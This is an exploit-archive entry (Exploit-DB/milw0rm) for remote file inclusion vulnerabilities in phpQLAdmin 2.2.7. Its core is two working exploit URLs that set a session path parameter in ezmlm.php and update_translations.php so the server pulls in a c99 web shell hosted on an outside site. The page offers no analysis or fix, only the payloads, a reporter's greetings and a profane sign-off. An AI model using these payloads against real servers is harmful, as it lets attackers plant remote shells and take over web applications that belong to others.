phpQLAdmin 2.2.7 - Multiple Remote File Inclusion Vulnerabilities

2008-02-22T00:00:00
ID EDB-ID:5173
Type exploitdb
Reporter RoMaNcYxHaCkEr
Modified 2008-02-22T00:00:00

Description

phpQLAdmin 2.2.7 Multiple Remote File Inclusion Vulnerabilities. CVE-2008-0167,CVE-2008-1067. Webapps exploit for php platform

                                        
                                            # Name : phpQLAdmin 2.2.7  Multiple Remote File Include
# Download From : http://phpqladmin.com/phpQLAdmin-2.2.7.zip
# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]          
# Home Page :  WwW.4RxH.CoM  
+============================================================================+
# Vulne Code In Files ezmlm.php & update_translations.php
# Exploit :
http://www.4rxh.com/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/tools/update_translations.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : RxH@HotMail.iT
# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake
Best Wishes

# milw0rm.com [2008-02-22]